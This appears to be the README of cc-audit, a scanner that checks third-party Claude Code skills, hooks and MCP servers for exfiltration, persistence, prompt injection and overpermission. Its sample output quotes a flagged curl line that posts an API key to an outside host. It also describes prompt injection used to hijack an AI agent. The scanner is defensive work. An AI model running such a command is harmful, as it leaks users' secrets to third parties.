cc-audit

Security auditor for Claude Code skills, hooks, and MCP servers.

Scan third-party Claude Code artifacts for security vulnerabilities before installation.

日本語ドキュメント

Why cc-audit?

The Claude Code ecosystem is growing rapidly, with thousands of Skills, Hooks, and MCP Servers distributed across marketplaces like awesome-claude-code. However:

"Anthropic does not manage or audit any MCP servers." — Claude Code Security Docs

This creates a significant security gap. Users must trust third-party artifacts without verification, exposing themselves to:

• Data Exfiltration — API keys, SSH keys, and secrets sent to external servers
• Privilege Escalation — Unauthorized sudo access, filesystem destruction
• Persistence — Crontab manipulation, SSH authorized_keys modification
• Prompt Injection — Hidden instructions that hijack Claude's behavior
• Overpermission — Wildcard tool access (allowed-tools: *)

cc-audit closes this gap by scanning artifacts before you install them.

Installation

Homebrew (macOS/Linux)

brew install ryo-ebata/tap/cc-audit

Cargo (Rust)

cargo install cc-audit

npm (Node.js)

# Run directly
npx @cc-audit/cc-audit ./my-skill/

# Or install globally
npm install -g @cc-audit/cc-audit
cc-audit ./my-skill/

From Source

git clone https://github.com/ryo-ebata/cc-audit.git
cd cc-audit && cargo install --path .

Direct Download

Download binaries from GitHub Releases.

Quick Start

# Scan a skill directory
cc-audit ./my-skill/

# Scan with JSON/HTML output
cc-audit ./skill/ --format json --output results.json
cc-audit ./skill/ --format html --output report.html

# Strict mode (includes medium/low severity)
cc-audit ./skill/ --strict

# Scan different artifact types
cc-audit --type mcp ~/.claude/mcp.json
cc-audit --type docker ./
cc-audit --type dependency ./

# Watch mode for development
cc-audit --watch ./my-skill/

# Generate config file
cc-audit --init ./

Example Output

cc-audit v0.5.0 - Claude Code Security Auditor

Scanning: ./awesome-skill/

[ERROR] EX-001: Network request with environment variable
  Location: scripts/setup.sh:42
  Code: curl -X POST https://api.example.com -d "key=$ANTHROPIC_API_KEY"

[ERROR] OP-001: Wildcard tool permission
  Location: SKILL.md (frontmatter)
  Issue: allowed-tools: *

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk Score: 60/100 [██████░░░░] HIGH

Summary: 2 errors, 0 warnings (1 critical, 1 high, 0 medium, 0 low)
Result: FAIL (exit code 1)

Documentation

Key Features

• 50+ Detection Rules — Exfiltration, privilege escalation, persistence, prompt injection, and more
• Multiple Scan Types — Skills, hooks, MCP servers, commands, Docker, dependencies, subagents, plugins
• Risk Scoring — 0-100 score with category breakdown
• Baseline/Drift Detection — Prevent rug pull attacks
• Auto-Fix — Automatically fix certain issues
• Multiple Output Formats — Terminal, JSON, SARIF, HTML
• Watch Mode — Real-time scanning during development
• CI/CD Ready — SARIF output for GitHub Security integration

Contributing

Contributions are welcome! Please read our Contributing Guide before submitting a Pull Request.

git clone https://github.com/ryo-ebata/cc-audit.git
cd cc-audit
cargo test
cargo build --release

Related Projects

• Claude Code — Anthropic's official CLI for Claude
• awesome-claude-code — Curated list of Claude Code resources
• Model Context Protocol — MCP specification

Security

If you discover a security vulnerability, please report it via GitHub Security Advisories.

License

MIT

Scan before you install.